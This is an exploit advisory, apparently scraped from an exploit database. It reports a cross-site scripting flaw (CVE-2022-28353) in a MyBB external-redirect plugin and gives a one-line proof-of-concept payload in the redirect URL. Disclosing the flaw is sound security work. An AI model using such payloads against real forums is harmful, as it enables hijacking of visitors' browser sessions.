## https://sploitus.com/exploit?id=PACKETSTORM:171403
# Exploit Title: MyBB External Redirect Warning Plugin 1.3 โ Cross-Site Scripting
# Date: February 1, 2021
# Author: 0xB9
# Twitter: @0xB9sec
# Software Link: https://community.mybb.com/mods.php?action=view&pid=493
# Version: 1.3
# Tested On: Windows 10
# CVE: CVE-2022-28353
Description:
This plugin notifies the user when they are being redirect to an off-site page. The redirect URL is vulnerable to XSS.
Proof of Concept:
โ Go to the following URLโฆ external.php?url=javascript:alert(1);
โ Click continue
Payload will execute